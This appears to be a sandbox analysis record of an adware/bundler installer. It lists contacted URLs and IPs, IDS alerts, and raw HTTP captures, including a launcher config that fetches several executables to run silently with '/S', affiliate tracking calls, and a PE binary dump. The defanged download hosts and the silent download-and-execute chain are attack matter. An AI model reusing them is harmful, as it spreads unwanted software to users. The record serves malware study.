hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif	52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif	52.85.173.111
pe-mik.net	23.253.126.58
pe-sixi.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible Call with No Offset TCP Shellcode
ET MALWARE SoundCloud Downloader Install Beacon

Traffic

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: text/css

Content-Length: 9386

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:54 GMT

Content-Disposition: attachment; filename="main.css"

Last-Modified: Thu, 26 Feb 2015 16:19:17 GMT

ETag: "9d7c4ddc39dddc3623e8a57e55afd079"

Accept-Ranges: bytes

Server: AmazonS3

Age: 22932

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: AxpttruDeYPYSaaD03kUx2pK-cZxu3ONjvZIoBiaVKD6A-p8oDEJgQ==
body {..    font-size:10px;.    background:#eaeaea;.    font-family: A
rial;.    margin: 0;.    padding: 0;.    color:#000000;        .}..div
, span, textarea {.    cursor: default;.}..a, a span, a div {.    curs
or: pointer;.}../* whole screen styles   */..ami-wrapper{.   backgroun
d : none no-repeat scroll 0 0 #eaeaea;.   border:2px solid #989898; .}
../* moddle element */..#ami-body.{..position: relative;.    padding-l
eft:27;.    padding-right:27;.}...bottom-line{.    background-color:#5
cafd4;.    height:45px;.    width:100%;.}..table {.    border-collapse
: collapse;.    margin: 0 ;.    padding: 0;.    font-size:10px;.}..tex
tarea {..font-size:10px;..font-family: verdana;..width:98%;..padding: 
5px;.}...textarea1{.    background:#ffffff;.    color:#000000;.    hei
ght:100%;.    width:100%;.    overflow-x:hidden;.}..td{.    padding: 0
px;.}../* footer and footer buttons */...bottom-holder{.    background
-image:url('footer_img.png');.    background-repeat:repeat-x;.    heig
ht:59px;.    position:absolute;.    bottom:0px;.    padding-left:20px;
.    padding-right:20px;.}...#btnNext{.    background:  url('next.gif'
) no-repeat;.}.#btnCancel{.    background:  url('cancel.gif') no-repea
t;.}../* Use for cancle with no popup !!! */.#btnBack{.    background:
  url('cancel1.gif') no-repeat;.}..#btnDecline{.    background:  url('
decline.gif') no-repeat;.}..#btnAccept{.    background:  url('accept.g
if') no-repeat;.}..#btnSkip{.    background:  url('skip.gif') no-repea
t;.}...btn-finish-install{.    background:  url('finish.gif') no-r<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 937

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:56 GMT

Content-Disposition: attachment; filename="footer_img.png"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "e2bf2d203887961a2e93c1a68b7e7534"

Accept-Ranges: bytes

Server: AmazonS3

Age: 22933

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: u73uWAq4qD-60Ao7_6nNmlTDlxjNPOLbwlgDINhDN2Xsl-MbfGFPKQ==
.PNG........IHDR.......;........B....tEXtSoftware.Adobe ImageReadyq.e&
lt;...!iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC (Windows)" xmpMM:InstanceID="xmp.iid:E57C9F23EFB911E397DFE4EB8
E55B910" xmpMM:DocumentID="xmp.did:E57C9F24EFB911E397DFE4EB8E55B910"&g
t; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E57C9F21EFB911E397D
FE4EB8E55B910" stRef:documentID="xmp.did:E57C9F22EFB911E397DFE4EB8E55B
910"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
 <?xpacket end="r"?>........IDATx.b.y........g...?.(....0.....N.
]l....IEND.B`.....


GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1262

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:55 GMT

Content-Disposition: attachment; filename="cancel.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "d92b8cccf7616d9e5f6162571dd3e1e8"

Accept-Ranges: bytes

Server: AmazonS3

Age: 33966

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 6dNBd6XodADlH9Q1FMpzvQgzTaC3tSxjpZ6ijnW3LpbN0wzDzjKQ8w==

GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................!.....u.,....e........o
t.............o..nC.............GCn.t.D.............BC.EF.............
EEJ.HHG.............H.J............*..IK.MNM......8.....H..H.`....*...
.!'O"J.H..D%....P.... C..8......D!.....0c.......4s.....O.....I.h.(S.QY
.....K....c...Vg,.......f. 0.k... \..b.. [email protected]...)U.U.b......W.0.....
.t..a.....7..7..."pt.<`...}/..M.o.,...^......_...`...MT.8p.........
Z..../.^...j:Y.K.N.zt,,.`...;.)&.h.>....X4.p...z...D. .............
.................. }.J0...&x...f...-......AH.]pa..(..".A....=.(....p..
..X#...0#.5. ..A....H&ib.......PF).._x.E...`..^.0...n9..[z........".P.
[email protected]..$...!..|....b..F.. ....$.....`....!g.6.j..?..A.[....?t.......
.....!d..........v....%.A.c.P@. .0..c.P..cT0@. .. ...P.... ......!gt..
....m...k..........n.f.AH...k...............p..../.......7.....!...Wl.
K..c....C..!l.,..$..r.(....,.<r.".!..n.l..8....<....=.-..o....t.
...L7...s....;....

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1740

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:55 GMT

Content-Disposition: attachment; filename="skip.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "7c96892b1948a6e97494e2d58cafe1c0"

Accept-Ranges: bytes

Server: AmazonS3

Age: 24710

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HoTJ0ZuyLf52bCU6zR4RVXezqb92Nx4JNbiS2eozQl8uRikHkE9fpw==

GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...........!.......,....e........|"E......*\......?...)....3j...... Cb
.....R...\[email protected]....>...C...:P.J.J.*U.X.:....
..`...C....h....'...d..= W...x...Cp..=....L..`>}...Q...>b.....N.
3~.k..y..>....M.....I...CB..1R......?....1.P............. _.\. :.f.
.$...@*@..$h. @y....$(P.A..._..O .....O.>.Ct..Idh. B.\.. ..........
f.!D.0..D..Uha}..B.!..... .(.....H...Q."..b..! ...[..../4...Vxq.......
D.9"!.....L6...O&....L........C... ......ta...$ D./ ...p:YH...h..x....
...F....."/<A...0.. .x........J..D......z2B."..*....jj#.(.F.d8....|
...#......t..!.$..........[*$.5..#.6....F.l#.0..#%....p...".........!.
4.I...R.....m$.A............".T..%.pPC./[email protected].".......!.%......v.1..
.4.$$.l..(.lr%}HQ..f@.. .`..$..`...l0.'6T@..?.........*cB.%PG-..TW

<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 3033

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:56 GMT

Content-Disposition: attachment; filename="accept.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "3484f982bbd281ea323f9dedb47098ed"

Accept-Ranges: bytes

Server: AmazonS3

Age: 23784

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: SUX8o78HrpiDvkT-uAomkPx7KVbDGp-WA7NWCfDq0rpC9U8TqV84ag==
GIF89ae...............!.(:.AhxjC.M..%...C.E...?.G...gvh*. *./*.3guhwww
?.H<.E>.E&.) .->.G;.Appp.....3-.3,./-.2*[email protected]<.A)[email protected]
.K'. =.D8.?:.A7.>6.<2.74.91.50.76.>..................C.K...}.
.o.t ./...............'.,^.d......L.R~..uuu...............J.N...<.C
...H.KL.P..................[._&. ...........................|.~......(
.-...4.?k.oB.KG.M?.G...[.^;.C...|.....y.}...a.f......;.B...Y.^...j.m..
.......I.M......?.B>.D............M.Q...........9<.?... .5o.s1.8
(.,A.K......C.I%.*..2?.Hgug)[email protected]>.F=.D6.;...'.)*.(*./-
.-?.=-..:.C../<.C...5.<[email protected]:.A,.2;.B;.BQ.\...O.Tkyl/.
3\._8.>'.-/.2>.F?.P<.F*.&-.34.9(.,@.I .....)./=.D3.8&.<C.K
#.*C.J .,~.. .&...#.&(.) .2,.3=.F,.5(./...{.}...=.E&.*Y.\-.39.B{.|....
.....hwi). iyjjzk-.2^.b>.J&.,q.ul.pm.pn.q...M.R......<.A......!.
.XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c
011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf=
"hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description 
rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef
="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns
.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:325014833434E41
1B829A1185F1C216E" xmpMM:DocumentID="xmp.did:D165859F343611E4B378E2150
F88781F" xmpMM:InstanceID="xmp.iid:D165859E343611E4B378E2150F88781F" x
mp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:Deriv<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 29603

Connection: keep-alive

Date: Thu, 28 Jan 2016 09:25:55 GMT

Content-Disposition: attachment; filename="dm_left_image.png"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "27e01b52fcb3f43ff9d3f29b0af69137"

Accept-Ranges: bytes

Server: AmazonS3

Age: 30684

X-Cache: Hit from cloudfront

Via: 1.1 f17892129c0657c8d9d0809a1b0b00be.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Zg60Q_S9Hj8UWsZktBjlMYau3ccBBqzn34I_x6L9vxVr29ZA5Bzxxw==
.PNG........IHDR.......e.....5Z......tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:A22384F4BB6C11E488CDA27B
4BADD3EB" xmpMM:DocumentID="xmp.did:A22384F5BB6C11E488CDA27B4BADD3EB"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A22384F2BB6C11E488
CDA27B4BADD3EB" stRef:documentID="xmp.did:A22384F3BB6C11E488CDA27B4BAD
D3EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>.O.8..p.IDATx...[..X.....I..12#.*..{z.f5.y[
....4..$..>.....X..#m.vU.LWfUf......u......`.#3"....H.x.....o......
.i.$...@.........~.Z..xd...w..,....;9......<..-...B.......o.....7._
..w.Y....kn?>...T=..|:..^k.;......".J..B.gM.f).|...<..rK....=.7.
.Z.g....SDG..`.tm.q......ZS...(.V.<....Y.....;z.,?>..|*...k..}ip
..C..=..|B...kV-W.....J....X....k...y>.[z.5.d.l..W.u.1/.....|...r.v
.r}..|*...k...........j<.....p|Q=........$.....C...<..-....{.`..
....._.?x......q.7S>.......W...'_...#..#.p..a.Gy.O...sM!........S..
.3^.p.s.|[email protected]|s3.......?..Bi.&....k._..........<<< skipped >>>

GET /launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7 HTTP/1.0

Host: 46.21.100.248

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Date: Thu, 12 May 2016 21:58:34 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 630

Connection: close

Content-Type: text/html; charset=UTF-8
files=3.t1=dl.u1=hXXp://get.wenter3.space/?affId=1006&appTitle=Install
ation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11.n1=
cpSetup.exe.m1=0.d1=0.t2=dl.u2=hXXp://VVV.dosecuretrips.com/download.p
hp?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe
-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=insta
ller&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com
/img/icon_installer.png.n2=Setup__2140_il65.exe.m2=0.d2=0.t3=dl.u3
=hXXp://sub.spirlymo.com/installers/cli/1463083280319/SevenZip_downloa
der-Qa3a1oW9v.exe.n3=SevenZip_downloader-Qa3a1oW9v.exe.m3=1.d3=1500...
..

GET hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1

Host: up.freeo9.space

Connection: close

Accept: */*

User-Agent: InstallCapital


HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 77864

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Thu, 12 May 2016 21:58:15 GMT

X-Cache: Miss from cloudfront

Via: 1.1 55ee6ea70e0823309f10db2e4b8f119f.cloudfront.net (CloudFront)

X-Amz-Cf-Id: dFWWzMDaXm9o2cUYSzXKfcmt70Hq9SrANsufsglhTiIZRG8X1QGlyA==
;.7A..0.....{.HU.T/`...{.1xw.>0...O&..}..tJt...".3.E...FY.....db.zr
L.J.{E5..............>.n.R........H`...........$..;.L...c$A.<.c.
j.k....E...a...V._.a)V.0.<)....L.B.C.5..r/..SY......}Q. s-D.2...c..
wR.N. ...ve7Z.a...#....'.........x.......-.m.9.9..t-..{..1c.5|...esB?.
c.^lyh.....0.2Ab..._...$p..3....U..=5...&.8)..........Y.....CK....n...
..........4....&....$........F.m.Ns:en#..8(..'........[..a..=......3N.
./.*d.D:1.=..8K.......9..3......51..E[..$....W..2.[^ZV. `....'..E.X.*.
=.H...Z.}....3. "s.Y...?....x.A....,...!.._..32.BiF....i.x.........g9.
....$.D.{.."Q.X8.....0...{......F."...o.L......R..e!v.....~......^.-..
...(er.D..8...U.#...w.hj.I<;.2....5.._b...O....|.@ .........7>.Q
.........AX...9....V...a..P.k.#........Yb..;~|d.....:......H..R6.T..\.
..X.:.gO.=3...._\.E.n........Xp.I.....u.6..q.m.......N..!..R...w...eT.
e....'..c...k.x..'!..[f....t..I..Xk?......:rg..|k.D........^..;x9}.9.C
[email protected].@/.........%l(.1..&O.).y..D..I`....c...|%.L.T./J..
.....U.7d.|...70.}......u(F...Y..Z.. X...u...;..Y...b.7{.F^c>tP5...
.)..G..;...s..OB...S...)..q/t..p `"l.~..jU.j.....p...#...;..o..,.s"...
...g.Yw.6Xk2g}..G.X7..x.2.....?.'.K....;.A..9.......4.Jl....p"..,..S..
.F.I....i.*.>.N..h.~a....0.....XD..[)'D o. C#t.i..=.u.vk...'.....2.
[email protected]{o...4BkW.<[email protected]}Nt......*...i........~..........H6z/....
....2F.*...>.w..l..^..;.,k.......`M(.X./....~.......\.a_..%..S...S.
.J.......'G..n...zC.fV{.R...F.....B(TVn..-.,.=....`...S_..l'.K.U4)....
[email protected].=..z..R`...X ~.1...KN.ox.....J$..k......b.<<< skipped >>>

GET /V35/amipb.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 69943

Connection: keep-alive

Date: Sat, 12 Mar 2016 06:56:00 GMT

Last-Modified: Sun, 28 Feb 2016 13:30:41 GMT

ETag: "76a09d03456de6b830f2d57dae56f423"

x-amz-storage-class: REDUCED_REDUNDANCY

Accept-Ranges: bytes

Server: AmazonS3

Age: 25042

X-Cache: Hit from cloudfront

Via: 1.1 02559733574bc91699d28e7c3b1df3ea.cloudfront.net (CloudFront)

X-Amz-Cf-Id: TBECHG2c6pKJlssRDmoZh4_yi0QFndUd1uwc4WmuMo8wAwEbV03m6g==
..//<!-- ../*    Progress bar   */..var g_AmiPbs = new Array();.var
 g_AmiPbsEx = new Array();.var g_interval = 0;.var g_initComp = 0;.var
 g_possibleComps = [];.var g_reportedComps = [];.var g_removedComps = 
[];..var g_disable_updater = false;..//in the version we tests updater
 task is created firstly.var g_UpdaterTestVersion = (typeof (g_ver) !=
= 'undefined' && g_ver != null && g_ver == '1.1.5.90');.var g_UpdaterT
askCreated = false;..function LogMessage(message) {.    try {.        
g_ami.Log(message);.    }.    catch (excpt) {.    }.}..function IsDecl
ined(name) {.    var declined = 0;.    for (var i = 0; i < g_remove
dComps.length; i  ) {.        if (g_removedComps[i] == name) {.       
     declined = 1;.            break;.        }.    }.    return decli
ned;.}..function UpdateSkipStatus(sn) {.    if (g_testa && !ArrayConta
ins(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayCont
ains(g_notest1, sn) && !ArrayContains(g_notest2, sn)) {.        if (g_
testa.constructor != Array || ArrayContains(g_testa, sn)) {.          
  g_ami.WriteProfileString(g_testf, '', sn, 'S');.            g_report
edComps.push(sn);.        }.    }.}..function ShortNameFromName(name) 
{.    for (c = 0; c < g_comps.length; c  ) {.        if (g_comps[c]
.name == name) {.            return g_comps[c].sn;.        }.    }.   
 return name;.}..function UpdateComponentsStatus() {.    LogMessage('U
pdateComponentsStatus function started');.    for (var j = 0; j < g
_possibleComps.length; j  ) {..        if (g_possibleComps[j].sn =<<< skipped >>>

POST hXXp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1

Host: up.freeo9.space

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 42

cid=707569c4c57c87d53171d83f71777ffd&uac=1
HTTP/1.1 403 Forbidden

Server: CloudFront

Date: Thu, 12 May 2016 21:58:38 GMT

Content-Type: text/html

Content-Length: 689

Connection: close

X-Cache: Error from cloudfront

Via: 1.1 6fd049110ebc3ac6deddab8b0bf5d686.cloudfront.net (CloudFront)

X-Amz-Cf-Id: f_8c4yhPzmIFjr9jUXT7pgs5ckvNVdeIe5qUEpLqf_FCK2KqNqJJaQ==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method 
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: f_8c4yhPzmIFjr
9jUXT7pgs5ckvNVdeIe5qUEpLqf_FCK2KqNqJJaQ==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..

GET hXXp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1

Host: up.freeo9.space

Connection: close

Accept: */*

User-Agent: InstallCapital


HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8

Content-Length: 590

Connection: close

Location: hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Thu, 12 May 2016 21:58:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 0991a4b934302d120a32dada6513dc35.cloudfront.net (CloudFront)

X-Amz-Cf-Id: JWYNAkiuILpXQ1Kk2y1g9KTG0tNfq-9NJtzHOy55PKMELqgR_y9j0Q==
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=100
6&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&
;aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.
php?affId={aff_id}&trackingId=45486395&instId=11
&ho_trackingid={transaction_id}&cc={country_cod
e}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer%
26uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here<
;/a></body>..

GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0

Host: VVV.dosecuretrips.com

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Access-Control-Expose-Headers: X-Target-FN

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Content-Disposition: attachment; filename="Setup__2140_il65.exe"

Content-Type: application/x-msdownload

Date: Thu, 12 May 2016 21:58:41 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Last-Modified: Thu, 12 May 2016 21:58:41 GMT

Pragma: no-cache

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

X-Target-FN: Setup__2140_il65.exe

Content-Length: 784080

Connection: Close

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........|i:...i...i
...im..i...im..i...im..i...i...i...i.e.i...i.e.i...i...i...i...i...i..
.i...i...i...i...i...iRich...i................PE..L.....4W............
.....h...r.......t............@..........................0.......y....
@..................................G..(........@......................
.$...................................2..@...............<..........
..................text....f.......h.................. ..`.rdata.......
........l..............@[email protected].......<..............@...
[email protected]..............@[email protected]............
[email protected]............................................................
......................................................................
......................................................................
......................................................................
......................................................................
..............vC............................U...E.]...................
......................................VW..W..j.V..|.......>_^......
...U...E....E..A...]...............U...Q.V.u...........^]..........U..
.U..M..........3......]......U..Q.E.V.p....0.u........^Y]....U...u..E.
....t..u........]...2.]................U..Q.E.V.p....0.u........^Y]...
.U..Q.u..$.....t..u....u......Y]...2.Y]..........V...h.....^.....V...(
.....^.....3..........u....w.....&.........j.j.j.h........B.......

<<< skipped >>>

POST hXXp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1

Host: set.downor3.space

Connection: close

Accept: */*

User-Agent: InstallCapital

Content-Type: application/x-www-form-urlencoded

Content-Length: 42

cid=707569c4c57c87d53171d83f71777ffd&uac=1
HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Thu, 12 May 2016 21:58:16 GMT

Connection: close

Content-Length: 428584
...no)9.VB.!.A0....z6.Y...4..S.W..Q2....d.P.f.<.......2.....#.....4
..).wHh./P.<\4_..../C.?..P.....D..o....}..VO............%.#X..=q..N
.c..N.}...pI..H.y.hz!v.R..g..D..V.q.~..Evq.......k..Y....v.....*].....
.q..t........<D12=..<.C5..Li].5.=I....oj..)..M&..........G..d...
..b...Y39....!P..?..V..WP.NNG...'..vD...gi....k........1.`.L.[...eQ.g.
"."".......w.....E9..$..F.Di.....C...Nj.&..U..n......u# ..y...~..rLX..
..#.FKg..N..|.... 8.vKs...3....-.C..DYW.1G.}bdOV...T..R%....MzO....`..
..!?...._E.Z.^7..!...(.Q'z'..1.`..%.....f...49..|.IB4..K.Vz...Gs.Cd.].
...Wm3!..i.K......\.....}).......,.:.5Wt....I...^4.....O..E"...A.#.|fp
.^.(}....|0....0.!k.E...E.o..L.Y..9....'h4....6...p0....S....{.w{.K..v
..8Z....L......'R....P.'.1.&..e.sY^.d..^F>(3...BXG..U...)s{..H...&l
t;A..~........0c.2..L.gd...h.....a....8)'..........d....[.......].....
]....z..C.D...?.z^..$..$..z.5..<.. .Yq.~/..g...o..*.5'&....f....,c.
..k..... ....wA....L.k.......:...HK$]..9....*"..$,.}...An....-........
[email protected](...}.".Ds9s..2.....D..d#...y...o....-..K..~n.oW%..}C.\4.'
tH.@!....k.....>....B;3y.v..e},w6.......G.n......t...j^.90..6......
